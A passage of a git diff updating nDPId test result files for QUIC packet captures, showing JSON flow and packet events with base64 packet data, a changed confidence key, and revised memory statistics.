02201{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1568282515655,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1342,"pkt_l4_len":1288,"thread_ts_msec":1568282515655,"pkt":"nJcmWLFfnLbQWTW8ht1gDdl5BQgRQC5Kd00m\/X+beFstG0+KY8c7zJmR+rq64c0q4v2zvsWrxKMBuwUI0EbI\/wAAFwhgax2p4Mt\/UAjcZWkdxzWqcwBE5rEFViXUV0In7d2dXZD4W8++zjZDJBAgmoI+svdNaYLoeL2jqHl80IO9pEfUmkgFWLrT4IlQo8t\/87yXQq3IRCWsbaCVh5W99qNLF16ofVb625RKhJQKN3iU3vpP3WaISyCxGoJXiHsP7sj27ny7LXNNKzH3JhZ3bhiQLS2umcd29X6XChqhAWZjn23A4EHWtq4oNdhkFu8LZI\/zfG+rUZSQr5lxakbHyPuebWPbqVuz09T5esBIjonthwzDSYvYZa0ySbIdmaeXdhlU+E4gLC4WHroq5LZx9pnr7yREt9Dp2HJiUOt1EMzTCveDJnfcPHqR1d6\/YEuvBxkwGcxK7MQsgXVVjQjLsVYM3zgE\/nenut5XK3K7bJeAGfZxUrn\/Y\/S6NaLxM1FgdUyaPkXMATL13fHOLn2TPbUyanoNHsWUaGSz60C+oUnJItBjv49AfcrV5AnxAjninyCVT7ilbuKRBYQ5SPLHeBsT\/NbnYJzK0I1Zj3I7weUUkkcrweRBiR069XTJtWYqzSUqWU5sALkglRvuf6xbvYulQ0jX8ozHEripA5ju8KQBmPJZP7WSUIMlyS8g26Pb2k443GZRz9hlPYNrTsHRc88FbzG8+ahhy1UIvmg27b6gKLWKeoPRPqT\/23G0Wo1ikM4FoXKXzvnDWe1X8Z9PVn+LOSHYR1LqJoMp2f2mWQv847crRAwAw1YWxPVKlFpXb0rR+0hsSK+RIdQgAqDBA2QX26xlMLPLaV5FnoRKfTJi7o9j6TamnIQyR\/b\/g\/IDH2Be62ORQ7K4p27Oyqju5N6C9b0vid0F4+gZ13RNe5vPbvcGGwDUSCHzH5HuKrGh25US\/X91xJ8gist97L0Lrq0S80URKpcxHqC0QxbI4sgi04MOC\/6\/5f2icaiX5IcU\/hdojFqggO95m2grFOU8yda1Z+a+0B+UTPAWzUgGxyOkCthMdR1xVGZfRvlXwGjfBMd6dc\/vwfyp1b8YonfSnSW3vRZZoOvGgqRgE1cEyUD4uXR+I9J+U7b3lAENyqEE6S4PVFwPk4xcaNCNEAFsAmLQRfMnqgm4EclQ2fu\/X4rXYn\/w4VPhxSJ7gZUA4NgNeVynLRKqHUa727Gwo4yXA2fLLCZot4qNfI9GV8gEGhiMrmnJDuuHONvYi8VFwSgiQP9jsRAqGAnvDEEaUirzATf+CkE90c9u9BJN208aRmeL0Hgd\/ZHM6TlLySnssgUghAaObIZXCdBIsYxzkTGX3jv35junPGfSl4SRLk2gvnSptlPR\/Rn6scXnHyxcxY1Tth69QcUpqe9cAH3STuQaFNZjD1dVf2R7djGBGP8XFpAEp4Da6SL0QShqq2TI46wOMWpyGEWgp5CuFAlZyh9lsxPPSVCNRF6ZIHFDEA176ay7PnXocWlpL62qyFOm8ITDpOqmFNLCDdEm1Gb4uY5DgmlqhAIdCuIUzNcLPBAucHSIQlvc6jwsUov+E
yqsbCmhoguNjYqYWkTXfROVcd+bJTmI+cPOgPBBwa2oOWk+BLrQ6aBz1dQvhb5YuoZMwA09AEkY+2M7NcQxKjjOU+yU4Hx1Fn0nTrg3sFfxY6wAlusfFhQgzHz4cuAwlvBXae00jqiXWXUvQQ1Rtfra3X+TNbZCCp1e2k+Vki2RypB\/ckwHS7gD9wnM+\/\/rgzF\/7w=="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568282515655,"flow_last_seen":1568282515655,"flow_idle_time":200000,"flow_min_l4_payload_len":1280,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":1280,"midstream":0,"thread_ts_msec":1568282515655,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"h3-22","ja3":"d9e7bdb15af8e499820ca74a68affd78","tls_supported_versions":"TLSv1.3"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568282515655,"flow_last_seen":1568282515655,"flow_idle_time":200000,"flow_min_l4_payload_len":1280,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":1280,"midstream":0,"thread_ts_msec":1568282515655,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"h3-22","ja3":"d9e7bdb15af8e499820ca74a68affd78","tls_supported_versions":"TLSv1.3"}} 
02197{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1568282515692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1342,"pkt_l4_len":1288,"thread_ts_msec":1568282515692,"pkt":"nLbQWTW8nJcmWLFfht1jg4MNBQgRKzvMmZH6urrhzSri\/bO+xasuSndNJv1\/m3hbLRtPimPHAbvEowUIuNfA\/wAAFwjcZWkdxzWqcwhFc8YEuuNHtABAtpp6lo422zhpwEmkM9jMJwXgbUjN1owR7TPZ1JXY0x3to1D6g0dAafVV30k+fGVC\/0C4Lnu2sLDcx8bF+ojnk3GSUQTIdHu8ZX\/oVbrFn8IuIOJ3OaMKQNh30NDOQmduQ87svdAwpsnJ5RCWJgsXaKkJYeNxtTrcf\/UMkEEGwqmH7iXERiPPP6YaygHazOGgvsi3IgRqxtSyogodVJFIEF7\/I\/hK4c4fV\/Fp6TOnZq7yPU8RHUGd6f8AABcI3GVpHcc1qnMIRXPGBLrjR7REF+M5klzW6SVGEmXEZf3SgmWO3YJGZMJzHMMmsHpZMJuleNbNpwTfLHRv+w8U8jTxrick9JoK2C0BLjMMU4lyZBfsOtqy8CVjK71G6biWjirvwKveDUbbdnabD6oNKRkjU10KrpsRv07\/rr3\/DxiYNICA4+aqMz+EOwXWo58jzMZwzCPamN69kB0IxZj8SzHACrAvpI3mhJaTesCVi09n+Vjx8LN1j9+ciB82njpNGQqupy7Qg1DSJdzbPwEAh71uJyF2iB3iJGpO+cy2cML4KVvm81IPGXCiOmV58o3v5\/zmODjNmo2sfVOW9wf6PkvwpMzRrLhfpb7g\/8GFhwl4Yw4+ghn0eekbQWZnpZKkF4+ktWY8mTGVecRfIhXVpZaHrV6+jU8BF4DL68+dkgY\/AI15OZZ52IXevPDJv5nQvF4MBVYN4PDEtox+qpac1LTHNAeqQxSa69g15gLUO1TxuS1ywL2AY+BTIWioy9hE61HxGs\/ZqgzZK9mcRJcA1dvWBNaIUiSpdORjz8n0pKG8K\/4ou3pHJN8tLdmk66Qlvhq4T7hwQDIwVgb9q3keP6FrYLSeg\/J0qh+c2s9xPzmAsIVg9ZVDDHWX3Bcun6KxexZ4flHGnhxx5gihdcmy838IeEFcy7du2wwafPbat0Jj+jGrpEh+yIEM+DtfZqs9yQEdy\/MqTQFZpt+aZuMVHvsRxgp9ckGC0lTv66FWbXDl0UazKFBVhBALr2J0iQx9RaI2aenslg1ZNK4Bc+Cb91EVBWrZM10MM25SZ+fC29ATKbXKDxWyuH+nM3ACeSqc9x6e7lODjH2H79xEPA8nXIZozszF8WDBA9K6wgnma97DIVxV4gV9QTaSzRRZf7GOTqGIfycjVC4dW+EtiHjVND4FWrZia3IFSniSe\/c6Z8zy01Y4U7isxhUZE84FRn4gZ+V\/LlAqURAOifpcMdrbloG+azDOECnPpupOebIuXwWz7aOW1fuY\/H1I+R4NtFDR8J3Xw+payk7QhXdsFx5GWInJP3dTMaCf7cVsQwH9u0KYAcwhL8Cwh+DnwFPiuH4IialTTqxwU\/T+06FOuOrMPq+bKnPZ5FwJAgHNilWYjP7NfZyL47Oq9aVGecGeTMEVn1UOO1QiFCmqyGvATws+6y3jOAqvQGQaZwrrHaE+V+KOl6f9J9WMLa6SkuWVKt++KVL5CFRWyl
gx+1d9Uek8ct9jA8ZlmfNzZ9cA+5HqJ1DeuTlGJqOlBCtnXfinCTal7z1JN5uB10EcGFFvKfAbK7xwlVGsEn6XXUBj0DLCMr40cur5GW3A0wuiby+nlkq7AslBw7l3uUqOibKhCVQJrTyCrMLKjl7uaVf6toOqyI\/5H1Aamf9JQmaiBUuE66iZeoeNEFEyhhGDVA=="} 01764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1568282515692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1017,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1017,"pkt_l4_len":963,"thread_ts_msec":1568282515692,"pkt":"nLbQWTW8nJcmWLFfht1jg4MNA8MRKzvMmZH6urrhzSri\/bO+xasuSndNJv1\/m3hbLRtPimPHAbvEowPDFkLs\/wAAFwjcZWkdxzWqcwhFc8YEuuNHtEMUyYrBFar3hn3903Wyiwal5ts19EiC\/\/0o403TuQXHzpo07QLjQNsCS6rfVQ9h\/bhZfcPHM1NTnnZdcI\/w+qZX0yTnNRovgdVWw6cVvyMMf\/AR4wKYphPcoUgcwsn7KReOxOm3nR3LYOawLtgN5YWMmql7MzZUW1CzcSjBB+M6TJiRoKw93nPerpbhVcyLUx25I3\/NADqEJnBz21jEouIL682I+IDJYwKoa48yaEr6CLTsyyGj\/lts\/4JjTKWASRBqsw7OY\/PZ+1W1OwDSwb\/PFJvlZQUl\/G5xBYfmg9n3A5KSgPg+AWI0iah3p4kBgWKDCRmgMv5aLdZqf97KuUEYmV3E77OatXFisUIwNgupj2ZBePSzcVFv6BviacQ0eIFnW\/WBQ8G99nQvGQgIVYRbS86l3ozgh4LzmRsw5Qx1M20rfV7sH8J5eDfvoJvM8Kt39vBoA2a\/YDhQooz13TukgVejyLKskuIKc854y2yoygBAiap3h\/2UZI1Hy+ylvot5B+\/VTalIWeEUdzPMUhYFiTMO6\/2d1DRzWkipTCjRPVLHWEScPJdEJ+VMNpVWsin+bWqHvT4BQnmP9jratt0VWOV2ObUqvupTouCJiGV9bM1dHvlMD7MRwtSrbsmRdsKZ3s9ntmpvH57yloY2vd7s1jXD5Tju8J3B+9DUXz6xNltvws\/LFUo2CSsbLQjNtWY3s5dPyf5CxKUWscmwismYbV97k961UCmVvPNlUhdtJ0fKJNxq75eNdsxnG3\/awZI3OuFYwxViRQiZCNMdgzOZGSKYfAy7Lp\/MhmSQ7bAc+NzZptzeI2dGY6EavQ3CQJraclZiH\/R2wGoMhKXvX1vwKDaGVZ6fDICtnupheoKdKLVVe1JbFxgSvP1CvU\/Fz5zvnUrUFgqsCm6EqZc9b0Nx46hJuQ+nXvuD7J3wzTSb4pIdJo3654drX\/so2eyJPJ93U+qbVr7vq7ywwBxcwDyk3BB58zXgOMZkN4mMUtFH32aXAokBlkhQ6f8WPzuTxuiyG3qJM8aRb4I2zN7cmOkjaJPcEMZK3GVpHcc1qnNubgcg9n\/B+tCxShTYqf9BsxGc4HfmCIwhwjiuwdU27nolghC\/g0vijyYzvRU15Q2hMyPcrtTOsXP1UDcSAxAEOHoM9K86QNjMEWUkGPI0wcCBc5w6OEh9AHnk5JwjWpUceKbwoH7jh6GuoflfGRMbCEmAFjB4Wu0Zq5vel1+DIem2Tl+i"} 
-00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1568282515655,"flow_last_seen":1568282515762,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5951,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1568282515762,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1568282515655,"flow_last_seen":1568282515762,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5951,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1568282515762,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic-23.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":5951,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1568282515762} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880205 bytes -~~ total memory freed........: 5880205 bytes -~~ total allocations/frees...: 118155/118155 +~~ total memory allocated....: 6013839 bytes +~~ total memory freed........: 6013839 bytes +~~ total allocations/frees...: 120917/120917 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2206 chars diff --git a/test/results/quic-24.pcap.out b/test/results/quic-24.pcap.out index 4d2de98e5..f2696dc19 100644 --- a/test/results/quic-24.pcap.out +++ b/test/results/quic-24.pcap.out 
@@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1574209133040} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574209133040,"flow_last_seen":1574209133040,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1574209133040,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574209133040,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1574209133040,"pkt":"ClnTQ78Jzivom94WCABFAAUA04pAAEARTk4KCQABCgkAAqHcAbsE7BkSw\/8AABgSKZqySaf1jUZ9aFypIIlM688aEfXDUlabjvj32ExHj28K\/LzWAES33jM5bR+MtpU1BLUazwIKZfi2UUsjupyQtwh0cwaTGSNsc3ziOvMvl5HeN7dnqFzrpWV5xSzaGXCCKPfdH3vP8j3J6ZLIzElZQZR3emJo528x+jgZIHOdaSnx3DWXxF2zh+YTIF4T7iX6QufVjaqbZGcqLfU2h5UhvDV4FwyX3uhlDNyKeZHYtgm98LQqq4\/RRT1KTyGKWwsLmYKiT2RZhGfdnj7cabAAzsX7Lk2p9chyJNCYC2rvLfiUJPAyxycnjNSX2Lj6Aqa8nfo2RgXdwfCaQgxab+TGB6bvb9v+EsUoxuSJh+r\/RN\/6YKeOx43w+asFLV8uu4y7ez42UTvh8WhWB9gu2sFvRZZAH2gXrPZjvaMUKjvUztSfZobDePj\/3bGH7ParnvadIlRAYU9Q2+DurqTinGpGLj1JdKLQoxeMx5eGSPtbuqNyirKapdyXJ8ZKCVjdL9m2B38WlanD9I0yGpWtoLvsOi8f8x\/fhHjJnp\/JSreuYABX7IvE9OH17Ka\/DYXSP3horLga3cmeawXPCcyfSVzp0vy3ZIaVNlu8tvkbFVJwffn9HIFK6HKNWjCpRF+ahuWdOTEeIZZ7i7JR8vw5bYFyaufxilZin8M6RIaJMeMrQc4vvfUfbDjsZuuyfMbD+CtkYjt3ODwFx3+9dnCnls3bcnN\/LK\/fVogu1W6dC2V8OgzkkQDp+glgaZFK3x1y9W9tAnAfcG86bUqaAVXac16E+jbjt3xUVxE3wSFwqpaXR87jZ7puVI7a++RK4x\/CPU7cBx4HxakipMRXAW7+Zzm5Uylji8R1ndMJge591UykzR\/a1rIFwcUFafwyzFwutVakAK\/iM4YhBMTpFZmHTyv44rZt\/SzvRW3ChO61o38I1VeCK0g8ZFXOiuIW\/pELm4Rr3xBh76iDlvWF6YcC0+i92ff1n2MDPlwUBp2JPBEhF9KRkoluOW0vEGZjgOTNF0WO0oSPjp6cRmPu7QFACVxUUAGGJ52pSjmae6FO4iTNFAYtrcv+HXjZLY56ae9mCQOyLL1m06CQPGFQiHOPr2CJqh4awJXrhUafIQCu5ugPi3shAySSxxSNpoi1XFyoXHmAfehBuKAMDEBi\/K2+sO4vF3gp9aph5gyVGEs0pc0rnIKidNla3xHEAlRzhJVd750Uscx9utTZFhNIJHFYbXnWol4tLG+jZZli4l18thfxYBatUVfQbpNdD\/lD+eYzZtOp7YtW1ZKF+ROaDrWxEjfCdVtcjK18Uyjgz5TeZuG7pFJ5t3qyXb+n\/5MzCAN9XPJPpQiYdvqPfvMUwezKWPFBlXc3KAr8TrBHXbzxwj68KugT8kPF6Hf1ZknvffVMbgWpKERCnzNCkdVDHz0qsfdTxN1E8gHLdnzTTb4wYHbDra2Qy1AzeGTZ5VuCqGVCxMyMSucpv1SUY2NRHw7nEKVm2pvwZDPcCeEad3kICbdC4XAMVUx0Mf\/rJlO1G38Dh
ZUFTtkiOIXY+C24n5VM7VxZQ+dzu2YG1ROOR1dGwLm4sR7mTJIH6rldcwpGAOA19nihJl7wI7sV3QgaIXVtqDL9j\/YH7Q44xODtLK6dfnLZ9llZp8VromtwQj2StAFDoQ=="} -00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574209133040,"flow_last_seen":1574209133040,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1574209133040,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-24","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}} +00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574209133040,"flow_last_seen":1574209133040,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1574209133040,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-24","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}} 
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574209133041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":177,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":177,"pkt_l4_len":143,"thread_ts_msec":1574209133041,"pkt":"zivom94WClnTQ78JCABFAACjQSNAAEAR5RIKCQACCgkAAQG7odwAjxS18P8AABgR9cNSVpuO+PfYTEePbwr8vNYSuDzEUSnLqX7jSNZH88cG3IWnEimaskmn9Y1GfWhcqSCJTOvPGgt6q75e4Qn+zUFJSyFY0SIiHRpQLjIDBESVGuKc8OTad8PhKZ1BA74OASFH4nOmQVGBciF1MYu4zBXJkM1rI\/zCp6CTKJAyA9IF"} 02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574209133041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1574209133041,"pkt":"ClnTQ78Jzivom94WCABFAAUA04tAAEARTk0KCQABCgkAAqHcAbsE7BkSzv8AABgSuDzEUSnLqX7jSNZH88cG3IWnEfXDUlabjvj32ExHj28K\/LzWQEoLequ+XuEJ\/s1BSUshWNEiIh0aUC4yAwRElRrinPDk2nfD4SmdQQO+DgEhR+JzpkFRgXIhdTGLuMwVyZDNayP8wqegkyiQMgPSBURs4UrqJXSOmdlzOQkT83Thm0cw7nGhY1Dqr9WBER804ydL76SsuNgGBxQl7a0HOKMMpAXLx8NIbh0fGKNE2byFJvnpcszX0hTK6rJr5u2g5MPDhCWVAqZWA\/ogTmUNM\/hiTPfQkeihINkuu2xiOaqPKq8sMuQjF678ZOS3GHn+0TKDo1\/YbLwJy\/ZpXJGxt30cfRSaAH1ZjGC\/le3BtTf6Ee25IG79XjyhHYyykWI2qhKWR0WZIipTrVnQ8OQ9VFey3MfNakIGaPPsyV69yfAmkmASAVXFu7Mo6y0Wz\/k+XakzO7FNz+SVS8r\/HampTgbi4jZsv70uNhIa7mA4qtW67mQ4Rtz5mrDrLhqz2cchVuQJJMooj0k2Xmg5SrVAA8L+yguIaKrDD971nuLq358VPAy8fRB724dILFO0lMVCte\/by\/Z5smTmpZsXjBALsYbcl4FVVEwEstKsA+gV11h+TKoi0PysZzUv4Co6O8\/IBnHMvA3aNldZ6T2\/ehbVZg8kV+TWp68hUC2ZNn0WR\/hIHa\/ud6KCIM2HuunHoyDST3M99tIIw9T05lx57290aLBbTURhE0FEw+sGowcXu3C80nVKiDimHMp1c6mqiWhDKZbGOAdpIWwpYqyGb1wbm5oAoXEAR7Mc+jjR0J8zJlFvt86aEVTtTJma3fejOJ3C6CfSBtcEM9aVUQVmL1wf7Fi6TTqbbFA9hnROhk7vqewbhtVmirjNaHoW3nHcl5Ky2MEXCHIhVYecuDZG8tKTrU
F\/HFpCaGl9ktkqkasn0g56PGXthtx8q15PYDSjv9yWDxzwqk6QO6Yvxw5QtpcdW836IfXVH9twCWk7tokUrBa+jkGq4sxymyp8HJzlBaLvbaRQuaENeIm3CsGj3g9j2MS5rx5x6bLrNsqG7vyWFoKKK6rqr6vFuCF2irBVzzRdUFclg1SSHgOpaIic+xLUKXq+lZZKiY1RKji5vWjtQKTKYEV029kaxm787YffQ8yTZZB6Hh6BkDWEPJYKpvcHrYxyRBFLQRGWx4ITq5kdTA0MWD1a5s3\/Tz1ghAL0hkcPsti\/Um+kiW+XSNOONWqykERpHTJUdF9XR9VjidFyK82bmGKcNXGpEf6KxiEWWOfrwygEpxaXYc1XPpi+3jqe95\/5QRYGsINOcrD5IkF6QniULDRMMwwkr\/ECjICIiZDSB0yvurV+rIeACZwQwc9BCfZ20PoMtA9Sb0+HvwlI89lLwU1WoQ\/uQFCU2G+iaFma79WKu7nfdJy0UCSpgYk\/WwxenGfaRqde0duIKqJ4VQR7DQ\/1P+Fdg7iOLJglPQ16bgg\/VS+HMi5ElBV9H43KK0X9+d\/wx6yTnUwB9LBosIDE739HoREBuU9qFyhmlmKq9iiXdK9S72zzDVpgLdZ5NTJCzLKyehhNiJq3WHWlmpoiXXclIQS2qvLhF3s8CmoQTCIFD2YwbMLNLc3NR5kX4hROEBrWwC9+79LiHN5YezdiHlgZ3UHXQ0QcCITAtA=="} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1574209133040,"flow_last_seen":1574209163081,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":7370,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1574209163081,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1574209133040,"flow_last_seen":1574209163081,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":7370,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1574209163081,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"quic-24.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":7370,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1574209163081} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879986 bytes -~~ total memory freed........: 5879986 bytes -~~ total allocations/frees...: 118150/118150 +~~ total memory allocated....: 6013620 bytes +~~ total memory freed........: 6013620 bytes +~~ total allocations/frees...: 120912/120912 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2139 chars diff --git a/test/results/quic-27.pcap.out b/test/results/quic-27.pcap.out index 041841739..468e4db30 100644 
